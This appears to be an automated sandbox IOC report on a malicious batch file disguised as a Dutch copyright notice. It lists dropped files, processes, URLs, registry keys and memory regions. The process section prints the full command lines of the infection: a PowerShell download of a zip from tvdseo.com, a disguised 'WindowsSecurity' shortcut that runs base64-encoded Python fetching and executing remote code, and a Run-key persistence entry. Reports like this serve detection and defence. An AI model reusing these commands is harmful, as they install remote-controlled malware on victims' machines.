IOC Report
Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat

loading gif

Files

File Path
Type
Category
Malicious
Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\WindowsSecurity.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23l5r2m2.bhw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hx1wpgj.c2r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4sxye424.0my.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjcjc4au.wzu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuet0v5e.q1c.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkjuvr2r.et5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcwchfer.hif.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt3mdod2.w5y.ps1
ASCII text, with no line terminators
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.Path]::GetTempPath() + 'qkxB9Wn8nG.zip') "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'qkxB9Wn8nG'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'qkxB9Wn8nG.zip'), $dst) "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\qkxB9Wn8nG\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c start "" "C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\explorer.exe
"C:\Windows\Explorer.EXE" C:\Users\user\AppData\Local\WindowsSecurity.lnk
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip
104.21.81.137
https://aka.ms/Vh5j3karstyl
unknown
https://aka.ms/odirmnt
unknown

Domains

Name
IP
Malicious
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.211.21
tvdseo.com
104.21.81.137

IPs

IP
Domain
Country
Malicious
104.21.81.137
tvdseo.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Security
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\ndfapi.dll,-40001
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1
1
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1
0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0
0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0
0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0\0
0
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0\0
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0\0\0
NodeSlot
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1\1\0\0\0\0
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell
SniffedFolderType
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
NodeSlots
There are 22 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
C93000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
C85000
heap
page read and write
C5B000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
C77000
heap
page read and write
CA4000
heap
page read and write
576F000
heap
page read and write
CA6000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
C90000
heap
page read and write
C5C000
heap
page read and write
C6E000
heap
page read and write
C85000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
C73000
heap
page read and write
C9F000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C78000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
5C80000
heap
page read and write
C80000
heap
page read and write
265E000
stack
page read and write
321F000
stack
page read and write
CA6000
heap
page read and write
6308000
heap
page read and write
C75000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
C85000
heap
page read and write
C5F000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C78000
heap
page read and write
60AC000
heap
page read and write
C77000
heap
page read and write
62F0000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
5681000
heap
page read and write
C85000
heap
page read and write
C75000
heap
page read and write
C80000
heap
page read and write
5CCC000
heap
page read and write
C80000
heap
page read and write
C94000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
62E0000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
C6E000
heap
page read and write
C77000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
C90000
heap
page read and write
C77000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C5F000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
5684000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C90000
heap
page read and write
CA4000
heap
page read and write
C75000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C75000
heap
page read and write
6308000
heap
page read and write
C80000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
C75000
heap
page read and write
C80000
heap
page read and write
60EC000
heap
page read and write
C93000
heap
page read and write
5681000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C94000
heap
page read and write
60AF000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
60B3000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
CA4000
heap
page read and write
5CDC000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
BB0000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
568E000
heap
page read and write
1CA1BD80000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
FF0000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
C86000
heap
page read and write
C90000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
C90000
heap
page read and write
5685000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C78000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
576F000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
C93000
heap
page read and write
C6E000
heap
page read and write
C75000
heap
page read and write
CA6000
heap
page read and write
DB0000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
5684000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
C77000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C75000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
62D0000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
C85000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
C73000
heap
page read and write
5689000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
C77000
heap
page read and write
C90000
heap
page read and write
C75000
heap
page read and write
13ED000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
5FF7000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
5727000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
C80000
heap
page read and write
C7C000
heap
page read and write
C75000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C85000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C6B000
heap
page read and write
5685000
heap
page read and write
CA6000
heap
page read and write
319E000
stack
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
CA4000
heap
page read and write
C75000
heap
page read and write
5CCC000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
C7C000
heap
page read and write
C85000
heap
page read and write
5EA0000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
C73000
heap
page read and write
C0F000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
1CA1BDA0000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
60B0000
heap
page read and write
C80000
heap
page read and write
C5F000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C77000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
576F000
heap
page read and write
576F000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
5C8C000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
C90000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
C94000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
1CA1BDCB000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
5CDC000
heap
page read and write
DD0000
heap
page read and write
5684000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
62D1000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
1370000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C77000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
60EC000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C94000
heap
page read and write
CA4000
heap
page read and write
BD4000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
5681000
heap
page read and write
C93807F000
stack
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C7C000
heap
page read and write
C75000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
C80000
heap
page read and write
C6E000
heap
page read and write
1CA1BF14000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C93000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
568E000
heap
page read and write
5748000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
6BDE000
stack
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
C80000
heap
page read and write
C73000
heap
page read and write
C90000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
60B3000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C94000
heap
page read and write
C80000
heap
page read and write
C93000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
CA6000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
C77000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C85000
heap
page read and write
CA4000
heap
page read and write
C74000
heap
page read and write
C75000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
60A3000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
574E000
heap
page read and write
C77000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
6304000
heap
page read and write
5681000
heap
page read and write
C6E000
heap
page read and write
5684000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
5681000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
C7C000
heap
page read and write
CA4000
heap
page read and write
C7C000
heap
page read and write
6301000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C85000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
C7C000
heap
page read and write
C6E000
heap
page read and write
C6B000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
2ACA000
stack
page read and write
C6E000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
C94000
heap
page read and write
C90000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C68000
heap
page read and write
56A1000
heap
page read and write
4268000
stack
page read and write
AC0000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
60E3000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
CA6000
heap
page read and write
5FCC000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
574E000
heap
page read and write
C78000
heap
page read and write
CA4000
heap
page read and write
C90000
heap
page read and write
BB9000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
60E6000
heap
page read and write
C9F000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
5C92000
heap
page read and write
CA4000
heap
page read and write
C93000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C90000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
C93000
heap
page read and write
568E000
heap
page read and write
C59000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
13A9000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
C5C000
heap
page read and write
CA6000
heap
page read and write
C94000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C80000
heap
page read and write
568E000
heap
page read and write
C73000
heap
page read and write
C6E000
heap
page read and write
568E000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
C90000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
13A0000
heap
page read and write
C73000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
1350000
heap
page read and write
C73000
heap
page read and write
C7C000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
C80000
heap
page read and write
26D8000
stack
page read and write
C73000
heap
page read and write
C93000
heap
page read and write
60A3000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
5685000
heap
page read and write
C85000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
568E000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
CA6000
heap
page read and write
56DB000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
C77000
heap
page read and write
C1C000
heap
page read and write
60D8000
heap
page read and write
568E000
heap
page read and write
C73000
heap
page read and write
CA6000
heap
page read and write
CA4000
heap
page read and write
C73000
heap
page read and write
C73000
heap
page read and write
5FB4000
heap
page read and write
CA4000
heap
page read and write
CA4000
heap
page read and write
C6E000
heap
page read and write
2CE2000
stack
page read and write
CA4000
heap
page read and write
CA6000
heap
page read and write
CA6000
